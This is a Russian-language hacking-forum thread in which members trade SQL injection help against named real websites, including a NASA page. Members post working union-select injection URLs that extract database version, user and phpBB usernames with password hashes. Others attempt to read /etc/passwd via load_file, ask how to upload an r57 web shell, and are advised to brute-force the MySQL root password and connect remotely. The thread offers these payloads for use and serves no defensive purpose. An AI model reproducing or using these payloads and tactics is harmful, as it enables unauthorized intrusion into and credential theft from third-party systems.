Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    ну последнее его предложение я чото не заметил ..
     
  2. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    А если в чар перегнать, непоможет? Т Т.к. хрен подберёшь руками...Если права то есть, может просто фильтрация какаято стоит.
    И где можно в чар перевести в онлайне где нибудь.
    И ещё, если в выводимое поле (любое) ввести load_file('/etc/passwd') равно как и load_file(0x2f6574632f706173737764) , то это поле просто пропадает, остальные остаются. В случае с table_name в information_schema -пропадают все поля, тут же остальные остаются. Это значит, что кавычки не экранируются и если file_priv есть то можно залить шелл? И как узнать, есть ли file_priv? И если шелл можно залить только в корень, это в public_html выходит? В ошибке просто не видно пути через public_html.
     
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    у тебя file_priv нету, ибо
    проверить есть или нет попробовав прочитать любой файл, что ты и попробовал сделать выше
    Так же инфа о наличии файл прив хранится в таблице mysql.user

    Полный путь можно узнать например в гугле, вообще тут есть об этом статься от [cash]'a, ищи
    В чар переводить - не сработает. Ты вместо имён таблиц увидишь "table_name"
     
    1 person likes this.
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    andreipup, там двиг - ворд пресс
    https://forum.antichat.ru/threadnav50572-1-40.html
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Так, У Велли проблема : ).Нашёл один проект,вскрыл,через schema_name узнал количество баз.Потом узнал,что на нём хостицо не один сайт:),а когда потался вывести все те таблицы,что были в этой базе,в других базах не прокатило.).Есть ли какой-то вариант получения доступа к ним ?. о_О, и запрос если можно, как должно быть в идеале: )
     
    #2025 Велемир, 24 May 2008
    Last edited: 24 May 2008
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    видимо у юзера от кторого работает мускул нет прав на другие базы
    если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть
    Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин
     
  7. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    никак не могу подобрать колонну для этой страницы

     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    В чём проблема то? Вывод есть:
    http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Жалко....доступ туда закрыт:).Остаёццо только расхешить.Ммм...Или подделать ид сессии:)*Ушёл искать скрипты*.
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вот так ещё лучше:
    _http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,null/*
    Вывод в <title> ,хотя, кому как удобнее
     
  11. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    Нашел уязвимость...но бд ведет себя странно...
    1.пробую group by , всё норм, 3 колонки...
    2.пробую union select 1,2,3/* появляется ошибка...
    Подскажите,плз)
     
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=2'+or+1=(select+table_name+from+information_schema.tables+limit+1,1)/*

    Почему-то не эксплотируеццо,в лимитки подставляю любое число,то же самое.Что неправильно ? И вывода кстати нету)(
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2†c0(aIn?†
    Там две колонки Вот вывод:
    _http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),2/*
     
    1 person likes this.
  14. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    Спасибо огромное,что помог.Кста,где можно почитать про спец.функции подобного рода или что-то типа этого?Перечитал все статьи [ cash ]'a,но про это ничего не нашел.

    ЗЫ:Буду ещё очень благодарен,если кто-нить подробно распишет,как залить шелл(например r57),инструкцию желательно в пм)
     
    #2034 †c0(aIn?†, 24 May 2008
    Last edited: 24 May 2008
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    †c0(aIn?†
    Это просто один из вариантов обойти кодировку.Про MySql можешь почитать например сдесь:
    _http://phpclub.ru/mysql/doc/reference.html
    Статьи по скулям на форуме :
    _https://forum.antichat.ru/thread19605.html
    _https://forum.antichat.ru/thread43966.html
     
    4 people like this.
  16. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    ок, а теперь как подобрать колонну для mx_page?
     
  17. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Скачай исходники MX-System и посмотри там, а вообще не думаю что в этой таблице будет что-то интересное, лучше смотри таблицу phpbb_users, http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,null%20from%20phpbb_users%20limit%201,1/*
     
    1 person likes this.
  18. ad1das

    ad1das New Member

    Joined:
    12 Mar 2008
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    Помогите с заливкой шелла в Ipb 2.3.3
     
  19. maxclk

    maxclk New Member

    Joined:
    15 Mar 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    никак не могу проапдейтить:
    comments.php?news_id=-1+update+table.news+set+title='lol'+where+id='517'/*
    пишет
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update table.news set title='lol' where id='517'/*' at line 1
    помогите, плз
     
  20. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    через инъекцию update не сделаешь... ;)
     
Thread Status:
Not open for further replies.